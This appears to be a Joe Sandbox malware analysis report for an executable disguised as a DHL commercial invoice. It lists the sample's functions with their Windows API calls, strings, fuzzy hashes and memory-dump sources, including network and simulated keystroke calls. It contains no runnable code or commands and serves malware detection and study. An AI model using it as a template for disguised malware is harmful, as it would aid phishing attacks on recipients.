Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 60c664951c54023f8d4c4044a61f0ac4da581767c933271f9dde5d03420e797c
Instruction ID: 31cab8fc9b82b3fabe88cdf2dd7b8f4f4c3f7b747f2c3d34f6db6a95f027d1fa
Opcode Fuzzy Hash: 60c664951c54023f8d4c4044a61f0ac4da581767c933271f9dde5d03420e797c
Instruction Fuzzy Hash: 6C31AD75960205BFEB31DF28E848BAE7BADFB413A1F51401AFB02D6184D7B4A944CF60

Function 01272C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01272C94

Part of subcall function 012729C8: HeapFree.KERNEL32(00000000,00000000), ref: 012729DE
Part of subcall function 012729C8: GetLastError.KERNEL32(00000000,?,0127D7D1,00000000,00000000,00000000,00000000,?,0127D7F8,00000000,00000007,00000000,?,0127DBF5,00000000,00000000), ref: 012729F0

_free.LIBCMT ref: 01272CA0
_free.LIBCMT ref: 01272CAB
_free.LIBCMT ref: 01272CB6
_free.LIBCMT ref: 01272CC1
_free.LIBCMT ref: 01272CCC
_free.LIBCMT ref: 01272CD7
_free.LIBCMT ref: 01272CE2
_free.LIBCMT ref: 01272CED
_free.LIBCMT ref: 01272CFB

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 585493afd21d93397e8493fd289567a0ed8d30a79b176c98c046e79b9fa4e436
Instruction ID: 1ad9da223838fcc4be17ee66e192dd1ba241ab727f163bb58509c5029e5b1e2d
Opcode Fuzzy Hash: 585493afd21d93397e8493fd289567a0ed8d30a79b176c98c046e79b9fa4e436
Instruction Fuzzy Hash: D211E976121109FFCB02EF64D840CEE7BA5FF15290F5554A4FA485F220D631EE909B90

Function 01241410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 01241459
OleUninitialize.OLE32 ref: 012414F8
UnregisterHotKey.USER32(?), ref: 012416DD
DestroyWindow.USER32 ref: 012824B9
FreeLibrary.KERNEL32(?), ref: 0128251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0128254B

Strings

close all, xrefs: 01241454

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 65bd61bec840c82003b2cd18252d86b7e1295c925c308680bda13c95fb002652
Instruction ID: 5721d9e18a2a6df0ca9c9634918cbd6e8ea4ca06e4ef7e779eb524eb7a100504
Opcode Fuzzy Hash: 65bd61bec840c82003b2cd18252d86b7e1295c925c308680bda13c95fb002652
Instruction Fuzzy Hash: 8DD15A31722223CFDB2DEF18D599A69F7A4BF04710F14429DDA4A6B291DB30AC62CF50

Function 012B7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 012B7FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 012B7FC1
GetFileAttributesW.KERNEL32(?), ref: 012B7FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 012B8005
SetCurrentDirectoryW.KERNEL32(?), ref: 012B8017
SetCurrentDirectoryW.KERNEL32(?), ref: 012B8060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 012B80B0

Strings

*.*, xrefs: 012B8066

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 8a32ff67f6295d52994eaa75446e6d99276e26d6d113d0737ef3db64cd77f5ac
Instruction ID: 232fa887c2d394d964ffa79cbed9fe3e7c6ea1bdf5e0450e576070f1b0fab52b
Opcode Fuzzy Hash: 8a32ff67f6295d52994eaa75446e6d99276e26d6d113d0737ef3db64cd77f5ac
Instruction Fuzzy Hash: AC81AF715242429BDB24EF18C484ABAB7E8BFD8394F144C1EFA89C7290E774D945CB52

Function 01245BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 01245C7A

Part of subcall function 01245D0A: GetClientRect.USER32 ref: 01245D30
Part of subcall function 01245D0A: GetWindowRect.USER32(?,?), ref: 01245D71
Part of subcall function 01245D0A: ScreenToClient.USER32(?,?), ref: 01245D99

GetDC.USER32 ref: 012846F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 01284708
SelectObject.GDI32(00000000,00000000), ref: 01284716
SelectObject.GDI32(00000000,00000000), ref: 0128472B
ReleaseDC.USER32(?,00000000), ref: 01284733
MoveWindow.USER32(?,?,?,?,?,?), ref: 012847C4

Strings

U, xrefs: 01284693

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 02a8059ccd8f63465d0129535fdafaad4a163afe228f420d34afe5ca4227a0d6
Instruction ID: 20a83093b2d33ef6ca280aaf07496f9fc318a053c5ea59f62bc236e150fa14af
Opcode Fuzzy Hash: 02a8059ccd8f63465d0129535fdafaad4a163afe228f420d34afe5ca4227a0d6
Instruction Fuzzy Hash: C471CE30421247DFDF29BF68C984ABA7BB5FF49324F14426AEA915A19AC3319841CF50

Function 012B359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 012B35E4

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

LoadStringW.USER32(01312390,?,00000FFF,?), ref: 012B360A

Strings

Error: , xrefs: 012B36EF
Line %d (File "%s"):, xrefs: 012B366B
^ ERROR, xrefs: 012B36C9
"%s" (%d) : ==> %s:%s%s, xrefs: 012B3724
"%s" (%d) : ==> %s:, xrefs: 012B3742

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 713fe89d474cea6997f3bffe26b3bac12c6e8dc17d11f9d5c50b68903bbc36cb
Instruction ID: aaf1e3fde629063b4f083fdd73cb9039ce4cb4c71b3fba103b304f506bf330db
Opcode Fuzzy Hash: 713fe89d474cea6997f3bffe26b3bac12c6e8dc17d11f9d5c50b68903bbc36cb
Instruction Fuzzy Hash: ED51827281021BABDF19EBA4CC81EFEBB79BF24344F044125E60572195EB301AD5DFA0

Function 012D8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 01259BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 01259BB2

Part of subcall function 0125912D: GetCursorPos.USER32(?), ref: 01259141
Part of subcall function 0125912D: ScreenToClient.USER32(00000000,?), ref: 0125915E
Part of subcall function 0125912D: GetAsyncKeyState.USER32 ref: 01259183
Part of subcall function 0125912D: GetAsyncKeyState.USER32 ref: 0125919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 012D8B6B
ImageList_EndDrag.COMCTL32 ref: 012D8B71
ReleaseCapture.USER32 ref: 012D8B77
SetWindowTextW.USER32 ref: 012D8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 012D8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 012D8CFF

Strings

@GUI_DROPID, xrefs: 012D8C51
@GUI_DRAGFILE, xrefs: 012D8C9A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 97197ff2b30c286d7d3d142ceb320df6adc0ecbd770beafac3d3ce9661e0414f
Instruction ID: 572cc0f1f3a8b14c966ebfa3fe648292299316b404499a0e5ffe2a81d276ed57
Opcode Fuzzy Hash: 97197ff2b30c286d7d3d142ceb320df6adc0ecbd770beafac3d3ce9661e0414f
Instruction Fuzzy Hash: 2C51DF71115301AFE718DF24D899FBA77E4FB88714F00062DFA92972D0CB709954CB92

Function 012BC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 012BC272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 012BC29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 012BC2CA
GetLastError.KERNEL32 ref: 012BC322
SetEvent.KERNEL32(?), ref: 012BC336
InternetCloseHandle.WININET(00000000), ref: 012BC341

Strings

, xrefs: 012BC2BB

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 266c061ab4568ff6bc20dbf078b5d31e5e696e4215442e4e56128758e3f4ff0d
Instruction ID: 0ec7c44389fd05b75cb1524e044c748b1ac9d6ecd8c5a1d338577c0de3bb5ef3
Opcode Fuzzy Hash: 266c061ab4568ff6bc20dbf078b5d31e5e696e4215442e4e56128758e3f4ff0d
Instruction Fuzzy Hash: 1F3180B1611209AFE7319F64D8C8AFB7BFCEB49784F44451EE58AD2200DB34DA64CB60

Function 012A989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,01283AAF,?,?,Bad directive syntax error,012DCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 012A98BC
LoadStringW.USER32(00000000,?,01283AAF,?), ref: 012A98C3

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

MessageBoxW.USER32 ref: 012A9987

Strings

Line %d (File "%s"):, xrefs: 012A992D
Line %d:, xrefs: 012A9912
Error: , xrefs: 012A9955
%s (%d) : ==> %s.: %s %s, xrefs: 012A98F1
., xrefs: 012A996D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: a596355f8f34e47b3c5e59decf320dab84b209e234d20f2b7402496e5895a8ea
Instruction ID: 32e261aa9c49ca88f9fd0080fd6d8bd005637e533b83bc9d5631630b7b9474b8
Opcode Fuzzy Hash: a596355f8f34e47b3c5e59decf320dab84b209e234d20f2b7402496e5895a8ea
Instruction Fuzzy Hash: AD216D32D2021BEBDF16EF90CC1AEFE7779BF28308F044459F515661A1EA7196A8CB50

Function 012A209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 012A20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 012A20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 012A214D

Strings

details, xrefs: 012A20FB
largeicons, xrefs: 012A20E1
list, xrefs: 012A212F
SHELLDLL_DefView, xrefs: 012A20CC
smallicons, xrefs: 012A2115

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: e1b5e8cee0122287263c894450f45e12a4c66bc4201d3a5f40773db7c6ab76af
Instruction ID: 8841856ef1c1cf90e4b23ec88204c1cc435858e25764725411b52caee34839be
Opcode Fuzzy Hash: e1b5e8cee0122287263c894450f45e12a4c66bc4201d3a5f40773db7c6ab76af
Instruction Fuzzy Hash: 96110A7A6A8307FAFA167525EC1ADBB37DCCF14328B60011AFB04A51D2EEA178514E54

Function 0127CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0127CEB7
_free.LIBCMT ref: 0127CF22
_free.LIBCMT ref: 0127CF48
_free.LIBCMT ref: 0127CF71
_free.LIBCMT ref: 0127CFA9
_free.LIBCMT ref: 0127CFDA
_free.LIBCMT ref: 0127D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0127D09C
_free.LIBCMT ref: 0127D0B5

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 17ed1929b82c1af12d30491d591b57cb3449441fb267eedac8e843a95d4199e2
Instruction ID: 411bef26fe8a1d35ee6d4dff064549728a302cffe33606d6d9a40c502da666d0
Opcode Fuzzy Hash: 17ed1929b82c1af12d30491d591b57cb3449441fb267eedac8e843a95d4199e2
Instruction Fuzzy Hash: F2614771924307EFDB36AFB89880A7F7FE8EF05360F14016FEA44A7285DA3199518791

Function 012D50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 012D5186
ShowWindow.USER32(?,00000000), ref: 012D51C7
ShowWindow.USER32(?,00000005), ref: 012D51CD
SetFocus.USER32 ref: 012D51D1

Part of subcall function 012D6FBA: DeleteObject.GDI32(00000000), ref: 012D6FE6

GetWindowLongW.USER32(?,000000F0), ref: 012D520D
SetWindowLongW.USER32 ref: 012D521A
InvalidateRect.USER32(?,00000000,00000001), ref: 012D524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 012D5287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 012D5296

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: f031038217331a9d7c064053471256748a972ffd754d19478e14ed808d6f60c2
Instruction ID: 0e1f3c04118bc6251057f3240529cfc738e072928d458d477c9d6f626f3203cd
Opcode Fuzzy Hash: f031038217331a9d7c064053471256748a972ffd754d19478e14ed808d6f60c2
Instruction Fuzzy Hash: AB516E30A6120ABEEF349E28CC4ABE93B75EB05365F148116FB25962D0C7F5E594CB41

Function 01258B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 01296890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 012968A9
LoadImageW.USER32 ref: 012968B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 012968D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 012968F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,01258874,00000000,00000000,00000000,000000FF,00000000), ref: 01296901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0129691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,01258874,00000000,00000000,00000000,000000FF,00000000), ref: 0129692D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 42f1d6e2716d97422a81864802d6f92aee372d59fe27ddceb20d3d3c27d07712
Instruction ID: 5d638790a3dc1ab970c7628d5fd14bfb9b0953f46302de1cc7ad3a9ebb91a4e0
Opcode Fuzzy Hash: 42f1d6e2716d97422a81864802d6f92aee372d59fe27ddceb20d3d3c27d07712
Instruction Fuzzy Hash: D6514F70A20206EFEF64CF29D885FAA7BB9FB44750F104518FA56D7290E7B1E950CB50

Function 012BC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 012BC182
GetLastError.KERNEL32 ref: 012BC195
SetEvent.KERNEL32(?), ref: 012BC1A9

Part of subcall function 012BC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 012BC272
Part of subcall function 012BC253: GetLastError.KERNEL32 ref: 012BC322
Part of subcall function 012BC253: SetEvent.KERNEL32(?), ref: 012BC336
Part of subcall function 012BC253: InternetCloseHandle.WININET(00000000), ref: 012BC341

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: c855528527a127ee73c2e92fb4021c83cdab7f05dda443c9e85be73dadb53796
Instruction ID: a01ffcca927f19323ddfc3abdc9c8d8564e2274514b7501daa8094d51bf046b9
Opcode Fuzzy Hash: c855528527a127ee73c2e92fb4021c83cdab7f05dda443c9e85be73dadb53796
Instruction Fuzzy Hash: 1B319471611606AFEB219FA9D888AB67BF9FF58380B04441DFA5AC6604D730E434DBA0

Function 012A25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 012A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 012A3A57
Part of subcall function 012A3A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,012A25B3), ref: 012A3A5E
Part of subcall function 012A3A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 012A3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 012A25BD
PostMessageW.USER32 ref: 012A25DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 012A25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 012A25E9
PostMessageW.USER32 ref: 012A2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 012A2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 012A260F
PostMessageW.USER32 ref: 012A2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 012A2627

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: a0816e5458e51b523c24d434bbc5769f76b240afae097e532627ed1d41c5c2fb
Instruction ID: 213c355f50d4b7f35a0d9f88b823f744f1c98f46258febc9f0cdf815e8175a60
Opcode Fuzzy Hash: a0816e5458e51b523c24d434bbc5769f76b240afae097e532627ed1d41c5c2fb
Instruction Fuzzy Hash: 9E01D830B90320FBFB206668EC8EF593F59EB4EB11F500015F314AF0C4C9E16454CAA9

Function 012A1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,012A1449,?,?,00000000), ref: 012A180C
HeapAlloc.KERNEL32(00000000,?,012A1449,?,?,00000000), ref: 012A1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,012A1449,?,?,00000000), ref: 012A1828
GetCurrentProcess.KERNEL32(?,00000000,?,012A1449,?,?,00000000), ref: 012A1830
DuplicateHandle.KERNEL32 ref: 012A1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,012A1449,?,?,00000000), ref: 012A1843
GetCurrentProcess.KERNEL32(012A1449,00000000,?,012A1449,?,?,00000000), ref: 012A184B
DuplicateHandle.KERNEL32 ref: 012A184E
